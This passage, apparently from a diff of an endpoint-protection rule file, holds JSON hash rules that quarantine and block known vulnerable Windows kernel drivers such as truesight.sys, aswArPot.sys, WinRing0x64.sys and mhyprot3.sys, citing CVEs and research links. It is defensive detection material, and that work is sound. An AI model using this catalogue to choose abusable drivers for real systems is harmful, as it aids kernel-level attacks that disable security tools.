"2026-03-23T11:45:30.818459Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "212c05b487cd4e64de2a1077b789e47e9ac3361efa24d9aab3cc6ad4bd3bd76a", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a33f32d-c7ef-5437-a35e-47908af457be", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144357Z", + "creation_date": "2026-03-23T11:45:31.144359Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144365Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ba14a1e3e51eaa08fb50d3768297efe407509d7ea52f7a9e7a25aacb25fe0c3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a373c51-9441-555e-b452-dc2960fb712e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141938Z", + "creation_date": "2026-03-23T11:45:31.141940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141952Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d470511934c81f329a0801774742e76f7c462ff3b324aeb00bc1861e6d8312e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a3d5e59-f70a-578f-ab6e-b1de7b283865", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149239Z", + "creation_date": "2026-03-23T11:45:31.149241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149247Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"0d890a2dace9686bccf5030ce6c745228e1d2ddf17b5c2f9015c2400e177aa05", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a3e068d-7c62-5b31-9318-c7e24af8abdc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818888Z", + "creation_date": "2026-03-23T11:45:30.818890Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "559ef0d415c5c3dbc1bfd598f4cad75aac9d4c5c6660fb61b23e44da4dbf89a9", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a4426e9-1efe-5309-ae00-902995d997c0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813648Z", + "creation_date": "2026-03-23T11:45:31.813650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13b5655c58306938d080551c66d473c1d16741a37450e6fba6c25f8ad496771e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a4ce970-7cd2-5fb0-807d-9ee0d8c51919", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969204Z", + "creation_date": "2026-03-23T11:45:29.969206Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969211Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "86a1b1bacc0c51332c9979e6aad84b5fba335df6b9a096ccb7681ab0779a8882", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] 
[https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a62e65f-a194-500c-84c9-499a17f147d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145485Z", + "creation_date": "2026-03-23T11:45:31.145487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0372eb7f1e79114ca1cb9d718b8b4a6297e2c38a460e9c13978b6d052c35b834", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a648736-1d70-5548-9e5f-4d003f11eb3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617185Z", + "creation_date": 
"2026-03-23T11:45:29.617187Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617192Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8", + "comment": "Noriyuki MIYAZAKI's WinRing0 dangerous driver (aka WinRing0x64.sys) [CVE-2020-14979] [https://www.loldrivers.io/drivers/f0fd5bc6-9ebd-4eb0-93ce-9256a5b9abf9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a791e18-a3e5-528e-8275-0f323e4b426c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.610975Z", + "creation_date": "2026-03-23T11:45:29.610977Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610983Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1399e65aa55c898a6cd5fb32d4b19f5bbaf69c56c1383963c99b7a0804eb0203", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a7e3c3b-3c13-5aa2-8593-0d5ef08e57ae", 
+ "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979221Z", + "creation_date": "2026-03-23T11:45:29.979223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979228Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec", + "comment": "Vulnerable Kernel Driver (aka nt2.sys) [https://www.loldrivers.io/drivers/cacc48e6-6ed8-431c-abee-88ee6c2dc3c1/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a819009-8046-5d96-a116-6d985de74d93", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.457621Z", + "creation_date": "2026-03-23T11:45:30.457625Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.457644Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "902b754dd302a994074ea8d3e619d2f9000e6c6997e428f19f41533f7c5e192c", + "comment": "Vulnerable Kernel Driver (aka rtkio64.sys ) [https://www.loldrivers.io/drivers/8d3f27bd-c3fd-48d0-913a-e2caa6fbd025/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a81a80d-85e4-5edb-a62a-d0a52f111990", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971255Z", + "creation_date": "2026-03-23T11:45:29.971258Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971266Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2bbc6b9dd5e6d0327250b32305be20c89b19b56d33a096522ee33f22d8c82ff1", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a897261-8c53-536d-8ce9-d993a3a3c599", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616899Z", + "creation_date": "2026-03-23T11:45:29.616902Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616911Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05e2d2f2b58da5391598d30d7f5f33ae38cfeb0d9b9ae19b4312de39c678f301", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a9442d9-b98b-53a7-9a5c-b2f3b18a975f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141856Z", + "creation_date": "2026-03-23T11:45:31.141858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141864Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7c906804b11db7ca188e268146df47da23c570e4641e02f933ae1d9d3519c399", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9a99b515-0416-5e24-9dd6-c71ad90daf0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491116Z", + "creation_date": "2026-03-23T11:45:31.491120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491128Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0a81746b9c63ddf4bc6fa6d073a1a98fcacea3a8b628a5d615bf5644d9e0bcf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9aa19a9d-ca6c-54db-bc9e-8e958d640f64", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818965Z", + "creation_date": "2026-03-23T11:45:30.818967Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818972Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "23440de2db935be1c06b40ff2809215d00d95930abe3fda70ea57cf8a9fc0e98", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ac7d5f5-33da-575b-be02-23f76869dc8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.481640Z", + "creation_date": "2026-03-23T11:45:30.481642Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.481647Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c662ed197a5849cf491ee099885f8855b4f8a3d0f5b664c772f2b89c0314b44e", + "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ac8379c-aeba-52d9-b960-fc24548aac30", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986014Z", + "creation_date": "2026-03-23T11:45:29.986016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7fd90500b57f9ac959c87f713fe9ca59e669e6e1512f77fccb6a75cdc0dfee8e", + "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ac8eaec-2709-5410-9917-ef1c7aa77968", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498938Z", + "creation_date": "2026-03-23T11:45:31.498941Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:31.498957Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0814a2a3868c0b660aa4f45294a8d5b7645547a71bee2e9420e9ac54378c7130", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ad1bdf8-2823-5118-b1dc-7564b78ae958", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982014Z", + "creation_date": "2026-03-23T11:45:29.982016Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982022Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b7fb154a7b7903a3c81f12f4b094f24a3c60a6a8cffca894c67c264ab7545fa", + "comment": "Vulnerable Kernel Driver (aka PCHunter.sys) [https://www.loldrivers.io/drivers/a261cd64-0d04-4bf5-ad73-f3bb96bf83cf/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ad2fe1c-ae81-5c25-b63c-92bf575c12c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155942Z", + "creation_date": "2026-03-23T11:45:31.155944Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3940329e2f14114ae5b6b043f736fdaf8b52a3a2926c3b5f0679815367acd20b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9ae19ee7-3f06-5bba-b0f8-d2df995da1af", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832425Z", + "creation_date": "2026-03-23T11:45:30.832427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832432Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "aff016b1ce411e0858adb479407aebcbb50c5355a76147465a70efb5656ab629", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9af48946-34fb-5838-a330-fc0512979faa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986195Z", + "creation_date": "2026-03-23T11:45:29.986197Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986203Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81b772e718e40e8d1d815cb3b16690c1ebd4e0bc555933db306037cc3341537f", + "comment": "Vulnerable Kernel Driver (aka pchunter.sys) [https://www.loldrivers.io/drivers/73290fcb-a0d7-481e-81a5-65a9859b50f5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9af600fd-4e30-5ca9-95b9-98b9962efe47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + 
"username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985027Z", + "creation_date": "2026-03-23T11:45:29.985029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985034Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955", + "comment": "Dangerous Physmem Kernel Driver (aka Dh_Kernel.Sys) [https://www.loldrivers.io/drivers/dfce8b0f-d857-4808-80ef-61273c7a4183/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "9afffc8a-739f-529f-a019-88e7d8fc36cf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 